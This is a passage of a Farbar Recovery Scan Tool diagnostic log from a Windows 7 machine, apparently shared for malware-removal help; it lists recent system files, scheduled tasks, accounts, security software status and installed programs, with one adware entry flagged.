2019-11-18 14:03 - 2013-03-19 22:08 - 000740656 _____ C:\Windows\system32\perfh015.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000714178 _____ C:\Windows\system32\prfh0416.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000684052 _____ C:\Windows\system32\perfh00E.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000607286 _____ C:\Windows\system32\perfh008.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000494812 _____ C:\Windows\system32\perfh014.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000479312 _____ C:\Windows\system32\perfh001.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000417076 _____ C:\Windows\system32\perfh011.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000171600 _____ C:\Windows\system32\perfc00E.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000156198 _____ C:\Windows\system32\perfc015.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000149906 _____ C:\Windows\system32\perfc00C.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000147982 _____ C:\Windows\system32\prfc0416.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000122426 _____ C:\Windows\system32\perfc011.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000111454 _____ C:\Windows\system32\perfc008.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000095730 _____ C:\Windows\system32\perfc014.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000095098 _____ C:\Windows\system32\perfc001.dat
2019-11-18 14:03 - 2013-03-19 15:24 - 000481800 _____ C:\Windows\system32\perfh00B.dat
2019-11-18 14:03 - 2013-03-19 15:24 - 000101846 _____ C:\Windows\system32\perfc00B.dat
2019-11-18 14:03 - 2009-07-14 06:13 - 007211860 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-18 14:03 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2019-11-18 13:58 - 2018-07-17 21:31 - 000000000 ____D C:\Users\Vladana\AppData\Local\AVAST Software
2019-11-18 13:54 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-18 13:46 - 2017-09-05 15:33 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mp3tag
2019-11-18 02:26 - 2014-10-19 23:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\vlc
2019-11-17 22:16 - 2013-02-21 01:36 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Azureus
2019-11-17 02:16 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2019-11-16 17:47 - 2019-05-23 11:52 - 000003160 _____ C:\Windows\system32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389}
2019-11-16 17:47 - 2018-09-06 18:23 - 000003334 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2019-11-16 17:47 - 2018-09-06 18:23 - 000003206 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2019-11-16 17:47 - 2018-03-14 03:40 - 000004470 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2019-11-16 17:47 - 2017-09-02 20:05 - 000003488 _____ C:\Windows\system32\Tasks\igfxhk
2019-11-16 17:47 - 2016-03-23 08:37 - 000003052 _____ C:\Windows\system32\Tasks\SafeZone scheduled Autoupdate 1458718670
2019-11-16 17:47 - 2016-01-03 12:45 - 000003652 _____ C:\Windows\system32\Tasks\DivXUpdate
2019-11-16 17:47 - 2015-12-03 22:42 - 000000000 ____D C:\Windows\system32\Tasks\AVAST Software
2019-11-16 17:47 - 2015-06-10 12:59 - 000004458 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2019-11-16 17:47 - 2015-06-10 12:47 - 000003850 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1433936833
2019-11-16 17:47 - 2015-02-06 11:56 - 000003432 _____ C:\Windows\system32\Tasks\RealDownloader Update Check
2019-11-16 17:47 - 2015-01-06 11:27 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2019-11-16 17:47 - 2014-07-14 00:42 - 000003226 _____ C:\Windows\system32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C}
2019-11-16 17:47 - 2013-07-27 16:59 - 000003176 _____ C:\Windows\system32\Tasks\{9194DE95-4B06-4F9D-B927-18DB5B401FBF}
2019-11-16 17:47 - 2013-03-15 02:37 - 000003192 _____ C:\Windows\system32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85}
2019-11-16 17:47 - 2013-02-28 00:53 - 000003390 _____ C:\Windows\system32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-16 17:47 - 2013-02-21 21:07 - 000003508 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA
2019-11-16 17:47 - 2013-02-21 21:07 - 000003236 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core
2019-11-16 17:47 - 2013-02-21 15:09 - 000003050 _____ C:\Windows\system32\Tasks\{3A66CE80-4733-4203-9F7A-462BED78E89F}
2019-11-16 17:47 - 2013-02-20 22:41 - 000004312 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2019-11-16 17:46 - 2019-05-23 15:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2019-11-16 16:21 - 2013-02-20 22:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\Microsoft Help
2019-11-16 15:55 - 2014-08-18 11:50 - 000000000 ____D C:\Program Files (x86)\Freemake
2019-11-16 14:54 - 2017-07-25 15:43 - 000000000 ____D C:\Users\Vladana\AppData\Local\FreemakeVideoConverter
2019-11-16 14:54 - 2014-08-18 11:50 - 000000000 ____D C:\ProgramData\Freemake
2019-11-16 13:48 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ZenGuard GmbH
2019-11-15 19:04 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\SquirrelTemp
2019-11-15 17:02 - 2013-02-20 21:51 - 000000000 ____D C:\Users\Vladana\AppData\Local\Google
2019-11-13 21:40 - 2013-02-20 22:41 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2019-11-13 21:40 - 2013-02-20 22:41 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2019-11-13 21:40 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\system32\Macromed
2019-11-11 15:42 - 2016-09-25 12:57 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Apowersoft
2019-11-11 01:33 - 2017-03-14 00:19 - 000004168 _____ C:\Windows\system32\Tasks\Avast Emergency Update
2019-11-11 01:28 - 2013-02-20 21:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-09 12:32 - 2017-04-16 10:33 - 000000000 ____D C:\Users\Vladana\AppData\LocalLow\Mozilla
2019-11-08 01:14 - 2018-09-06 18:24 - 000002184 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2019-11-07 18:44 - 2015-06-10 12:47 - 000000000 ____D C:\Program Files (x86)\Opera
2019-11-06 11:30 - 2016-09-05 13:58 - 000001271 _____ C:\Users\Vladana\Desktop\marker.txt
2019-11-05 05:03 - 2013-02-20 21:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mozilla
2019-11-05 00:06 - 2015-10-15 21:00 - 000000000 ____D C:\Program Files (x86)\Google
2019-10-22 01:05 - 2017-09-05 14:37 - 000000000 ____D C:\Program Files (x86)\Mp3tag
 
==================== Files in the root of some directories ========
 
2013-04-12 20:07 - 2014-11-17 02:37 - 000000580 _____ () C:\Users\Vladana\AppData\Roaming\AutoGK.ini
2013-03-15 02:55 - 2014-11-18 03:36 - 000010752 _____ () C:\Users\Vladana\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-19 01:43 - 2015-05-19 01:43 - 000247298 _____ () C:\Users\Vladana\AppData\Local\Tempdivx84f8
2015-07-02 22:06 - 2015-07-02 22:06 - 000043682 _____ () C:\Users\Vladana\AppData\Local\Tempdivxffab
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
 
LastRegBack: 2019-11-17 06:56
==================== End of FRST.txt ========================
 
 
And here is the copy of Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (18-11-2019 14:55:27)
Running from C:\Users\Vladana\Desktop
Windows 7 Ultimate (X64) (2013-02-20 19:53:32)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-7682389-3612777877-391866582-500 - Administrator - Disabled)
Guest (S-1-5-21-7682389-3612777877-391866582-501 - Limited - Disabled)
Vladana (S-1-5-21-7682389-3612777877-391866582-1000 - Administrator - Enabled) => C:\Users\Vladana
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Disabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Disabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader (HKLM-x32\...\4K Video Downloader) (Version:  - Open Media LLC)
ACDSee 10 Photo Manager (HKLM-x32\...\{F8B98EB6-FC06-45BF-87D4-9784E0408611}) (Version: 10.0.219 - ACD Systems International)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Adobe Flash Player 32 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version:  - ALPS ELECTRIC CO., LTD.)
Apowersoft Online Launcher version 1.6.1 (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{20BF67A8-D81A-4489-8225-FABAA0896E2D}_is1) (Version: 1.6.1 - APOWERSOFT LIMITED)
Auto Gordian Knot 2.55 (HKLM-x32\...\AutoGK) (Version: 2.55 - len0x)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.8.2393 - AVAST Software)
AVI ReComp 1.5.5 (HKLM-x32\...\AVI ReComp) (Version: 1.5.5 - Mateusz Gola (aka Prozac))
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Awesomium.NET Redistribution Module (HKLM-x32\...\{C34CAF35-6198-4EEB-970F-C61FC51D23BD}) (Version: 1.7.4.2 - ©2014 Awesomium Technologies LLC) Hidden
Bigasoft Total Video Converter 3.7.24.4700 (HKLM-x32\...\{a72ce741-1f32-4d79-bffb-a714375c678d}_is1) (Version:  - Bigasoft Corporation)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DivX Setup (HKLM\...\DivX Setup) (Version: 10.8.7.0 - DivX, LLC)
FileLab Plugin 1.1.33 (HKLM-x32\...\{6AC5F630-9453-433D-90FF-BB3A8E4F8960}) (Version: 1.1.33 - FileLab)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
Freemake Video Converter version 4.1.10 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.10 - Mixbyte Inc.)
Fujitsu Hotkey Utility (HKLM-x32\...\{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (HKLM\...\{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED)
Fujitsu System Extension Utility (HKLM\...\{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 78.0.3904.97 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.341 - Google LLC) Hidden
Google Video Support Plugin (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 19.11.1200.0 - Google, LLC.)
Hotspot Shield 9.21.3 Pre-Active (HKLM\...\{719C64E2-9BD5-4C6B-A13B-36E1DD27B015}) (Version: 9.21.3.11422 - hss721.blogspot.com) Hidden
Hotspot Shield 9.21.3 Pre-Active (HKLM\...\Hotspot Shield 9.21.3 Pre-Active 9.21.3.11422) (Version: 9.21.3.11422 - hss721.blogspot.com)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2696 - Intel Corporation)
Intel® PROSet/Wireless for Bluetooth® + High Speed (HKLM\...\{705EE775-5776-48FD-B704-C3C9CF535420}) (Version: 15.1.1.0170 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{F0932859-AA60-459E-B843-0BDECA34E2C7}) (Version: 2.0.0.0086 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{BAA0BE9B-9E6D-4802-91CB-FB7ED5CD4BEF}) (Version: 15.01.1500.1034 - Intel Corporation)
iPool (HKLM-x32\...\iPool) (Version: 2.2.03 - Memir Games)
iSnooker 2.2.60 (HKLM-x32\...\isnooker_memir_is1) (Version: 2.2.60 - Memir Games Ltd)
Java 8 Update 221 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180221F0}) (Version: 8.0.2210.11 - Oracle Corporation)
KeepVid Pro(Build 6.3.2.0) (HKLM-x32\...\KeepVid Pro_is1) (Version: 6.3.2.0 - KeepVid Studio)
LIFEBOOK Application Panel (HKLM\...\{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
Malwarebytes version 3.4.5.2467 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.4.5.2467 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM-x32\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\SkyDriveSetup.exe) (Version: 17.0.2006.0314 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{5BABDA39-61CF-41EE-992D-4054B6649A9B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 70.0.1.7242 - Mozilla)
Mp3tag v2.99a (HKLM-x32\...\Mp3tag) (Version: 2.99a - Florian Heidenreich)
MSVC80_x64_v2 (HKLM\...\{4D668D4F-FAA2-4726-834C-31F4614F312E}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC80_x86_v2 (HKLM-x32\...\{6D3245B1-8DB8-4A23-9CD2-2C90F40ABAF6}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC90_x64 (HKLM\...\{AB071C8B-873C-459F-ACA9-9EBE03C3E89B}) (Version: 1.0.1.2 - Nokia) Hidden
MSVC90_x86 (HKLM-x32\...\{AF111648-99A1-453E-81DD-80DBBF6DAD0D}) (Version: 1.0.1.2 - Nokia) Hidden
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Nero 8 (HKLM-x32\...\{B944FA21-81AF-4A77-8328-CE4F4CC51033}) (Version: 8.10.21 - Nero AG)
Noise Reduction Plug-In 2.0 (HKLM-x32\...\{B94515E1-2DD6-11E2-849E-F04DA23A5C58}) (Version: 2.0.515 - Sony)
Nokia Connectivity Cable Driver (HKLM-x32\...\{29373274-977E-413C-A4DE-DC0F8E80C429}) (Version: 7.1.172.0 - Nokia)
Nokia PC Suite (HKLM-x32\...\{866C4563-ED53-43F3-A29D-8BEE2BD1BA3C}) (Version: 7.1.180.94 - Nokia) Hidden
Nokia PC Suite (HKLM-x32\...\Nokia PC Suite) (Version: 7.1.180.94 - Nokia)
Nokia Software Updater (HKLM-x32\...\{7130468A-F53F-4698-8C09-A339EA3B05E6}) (Version: 3.0.655 - Nokia)
Nokia Suite (HKLM-x32\...\{88B6F9DE-C80F-4A70-ACF6-BEE933679170}) (Version: 3.8.54.0 - Nokia) Hidden
Nokia Suite (HKLM-x32\...\Nokia Suite) (Version: 3.8.54.0 - Nokia)
Opera Stable 64.0.3417.92 (HKLM-x32\...\Opera 64.0.3417.92) (Version: 64.0.3417.92 - Opera Software)
PC Connectivity Solution (HKLM-x32\...\{6D01D1B1-17BD-4F10-BB11-F08F0C47D42B}) (Version: 12.0.109.0 - Nokia)
PeaZip 5.2.0 (HKLM-x32\...\{5A2BC38A-406C-4A5B-BF45-6991F9A05325}_is1) (Version:  - Giorgio Tani)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (HKLM\...\{E1C056BE-ACC9-4FCF-B37D-55A46648B369}) (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.043 - FUJITSU LIMITED)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RealDownloader (HKLM-x32\...\{6FCD4D5A-20B9-4D79-ABA5-4E7048944025}) (Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (HKLM-x32\...\{e6171278-8759-449d-9e0b-c1825debc2ad}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealDownloader (HKLM-x32\...\{FBEFDC9E-F8FB-4B66-A78B-09B7B380D59D}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (HKLM-x32\...\{7770E71B-2D43-4800-9CB3-5B6CAAEBEBEA}) (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM\...\{21E47F47-C9A7-4454-BA48-388327B0EA00}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM-x32\...\{AAECF7BA-E83B-4A10-87EA-DE0B333F8734}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.53.216.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (HKLM-x32\...\{28C2DED6-325B-4CC7-983A-1777C8F7FBAB}) (Version: 1.1.0 - RealNetworks, Inc.) Hidden
RelevantKnowledge (HKLM-x32\...\{d08d9f98-1c78-4704-87e6-368b0023d831}) (Version:  - ) <==== ATTENTION
SafeZone Stable 1.48.2066.44 (HKLM-x32\...\SafeZone 1.48.2066.44) (Version: 1.48.2066.44 - Avast Software) Hidden
SolveigMM AVI Trimmer (HKLM-x32\...\SolveigMM AVI Trimmer 2.0.1210.11) (Version: 2.0.1210.11 - Solveig Multimedia)
Sound Forge Pro 10.0 (HKLM-x32\...\{8EF5E2B0-2DD1-11E2-89A5-F04DA23A5C58}) (Version: 10.0.507 - Sony)
Spotify (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Spotify) (Version: 1.1.8.439.g8502297d - Spotify AB)
Subtitle Edit 3.4.3 (HKLM-x32\...\SubtitleEdit_is1) (Version: 3.4.3.0 - Nikse)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version:  - )
Unity Web Player (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
UpdateService (HKLM-x32\...\{E3AE96D6-E196-45B4-AF62-2B41998B9E37}) (Version: 1.0.0 - RealNetworks, Inc.) Hidden
VC80CRTRedist - 8.0.50727.6195 (HKLM-x32\...\{933B4015-4618-4716-A828-5289FC03165F}) (Version: 1.2.0 - DivX, Inc) Hidden
VCRedistSetup (HKLM-x32\...\{3921A67A-5AB1-4E48-9444-C71814CF3027}) (Version: 1.0.0 - Nero AG) Hidden
Video Download Capture version 6.2.8 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.8 - APOWERSOFT LIMITED)
Video Downloader (HKLM-x32\...\{62796191-6F12-4ABE-BA8B-B4D4A266C997}) (Version: 1.0.0 - RealNetworks) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VobSub v2.23 (Remove Only) (HKLM-x32\...\VobSub) (Version:  - )
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 5.7.6.0 - Azureus Software, Inc.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.623  - Nullsoft, Inc)
Winamp Detector Plug-in (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Windows Driver Package - Nokia Modem  (02/25/2011 4.7) (HKLM\...\E0AC723A3DE3A04256288CADBBB011B112AED454) (Version: 02/25/2011 4.7 - Nokia)
Windows Driver Package - Nokia Modem  (02/25/2011 7.01.0.9) (HKLM\...\72A50F48CC5601190B9C4E74D81161693133E7F7) (Version: 02/25/2011 7.01.0.9 - Nokia)
Windows Driver Package - Nokia pccsmcfd LegacyDriver  (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Wondershare Filmora(Build 8.5.3) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.5.2 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.2 - Wondershare)
XviD MPEG4 Video Codec (remove only) (HKLM-x32\...\XviD MPEG4 Video Codec) (Version:  - )
ZD Soft Screen Recorder 11.2.0 (HKLM-x32\...\{05289906-8CDE-44FD-9FA5-95866BF511A9}) (Version: 11.2.0.0 - ZD Soft)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => No File
